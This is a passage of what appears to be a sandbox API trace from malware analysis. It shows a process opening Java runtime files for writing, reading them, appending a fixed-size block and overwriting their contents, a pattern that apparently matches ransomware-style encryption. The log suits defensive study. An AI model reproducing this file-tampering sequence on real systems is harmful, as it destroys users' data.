(hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.568] ReleaseMutex (hMutex=0x168) returned 1 [0116.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0116.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.exe", cchWideChar=8, lpMultiByteStr=0x1f7342c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.exe", lpUsedDefaultChar=0x0) returned 8 [0116.568] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0116.925] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x299a8 [0116.926] ReadFile (in: hFile=0x1cc, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.519] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x299a8 [0117.519] WriteFile (in: hFile=0x1cc, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.519] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0117.519] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0117.520] CloseHandle (hObject=0x1cc) returned 1 [0117.520] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\klist.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\klist.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0117.524] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0117.524] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3da8 [0117.524] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0117.524] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.524] ReleaseMutex (hMutex=0x168) returned 1 [0117.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="klist.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0117.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="klist.exe", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="klist.exe", lpUsedDefaultChar=0x0) returned 9 [0117.524] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.578] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2da8 [0117.578] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.613] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2da8 [0117.613] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea7b88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.614] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0117.614] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.614] CloseHandle (hObject=0x1cc) returned 1 [0117.615] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ssvagent.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssvagent.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0117.636] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0117.636] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xbfa8 [0117.636] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0117.636] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.636] ReleaseMutex (hMutex=0x168) returned 1 [0117.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssvagent.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssvagent.exe", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ssvagent.exe", lpUsedDefaultChar=0x0) returned 12 [0117.636] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0117.651] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xafa8 [0117.651] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.752] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xafa8 [0117.752] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.753] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0117.753] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0117.753] CloseHandle (hObject=0x1dc) returned 1 [0117.754] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\classlist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0117.754] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0117.755] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x12543 [0117.755] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0117.755] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.755] ReleaseMutex (hMutex=0x168) returned 1 [0117.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="classlist", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0117.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="classlist", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="classlist", lpUsedDefaultChar=0x0) returned 9 [0117.755] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0117.777] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x11543 [0117.777] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea8bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea8bb8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.788] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x11543 [0117.788] WriteFile (in: hFile=0x1dc, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.788] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0117.788] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0117.789] CloseHandle (hObject=0x1dc) returned 1 [0117.789] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqs.conf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0117.790] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0117.790] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x9f6e [0117.790] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0117.790] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.790] ReleaseMutex (hMutex=0x168) returned 1 [0117.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jqs.conf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0117.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jqs.conf", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jqs.conf", lpUsedDefaultChar=0x0) returned 8 [0117.790] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0117.815] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x8f6e [0117.815] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.836] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x8f6e [0117.836] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.837] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0117.837] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a8048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a8048*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0117.837] CloseHandle (hObject=0x1dc) returned 1 [0117.838] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0117.866] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0117.866] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1657 [0117.866] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0117.866] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.866] ReleaseMutex (hMutex=0x168) returned 1 [0117.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ko.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0117.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ko.properties", cchWideChar=22, lpMultiByteStr=0x1f88bcc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_ko.properties", lpUsedDefaultChar=0x0) returned 22 [0117.866] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea8bb8, nNumberOfBytesToRead=0x1657, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea8bb8*, lpNumberOfBytesRead=0x2b1f2bc*=0x1657, lpOverlapped=0x0) returned 1 [0118.221] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0118.221] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea8bb8*, nNumberOfBytesToWrite=0x1bdf, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea8bb8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1bdf, lpOverlapped=0x0) returned 1 [0118.221] CloseHandle (hObject=0x1dc) returned 1 [0118.221] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\access-bridge-32.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0118.582] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.582] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x148f8 [0118.582] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.582] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.582] ReleaseMutex (hMutex=0x168) returned 1 [0118.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="access-bridge-32.jar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="access-bridge-32.jar", cchWideChar=20, lpMultiByteStr=0x1f8867c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="access-bridge-32.jar", lpUsedDefaultChar=0x0) returned 20 [0118.582] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0118.595] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x138f8 [0118.595] ReadFile (in: hFile=0x1d8, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.599] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x138f8 [0118.599] WriteFile (in: hFile=0x1d8, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.600] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0118.600] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0118.600] CloseHandle (hObject=0x1d8) returned 1 [0118.600] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunpkcs11.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0118.601] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.601] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x39fd6 [0118.601] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.601] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.601] ReleaseMutex (hMutex=0x168) returned 1 [0118.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunpkcs11.jar", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunpkcs11.jar", cchWideChar=13, lpMultiByteStr=0x1f7358c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunpkcs11.jar", lpUsedDefaultChar=0x0) returned 13 [0118.602] ReadFile (in: hFile=0x1d8, lpBuffer=0x289b9a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x289b9a8*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.770] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x38fd6 [0118.770] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.777] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x38fd6 [0118.777] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.779] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0118.779] WriteFile (in: hFile=0x1d8, lpBuffer=0x289f9a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f9a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.780] CloseHandle (hObject=0x1d8) returned 1 [0118.780] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0118.790] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.790] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5434c [0118.790] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0118.791] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.791] 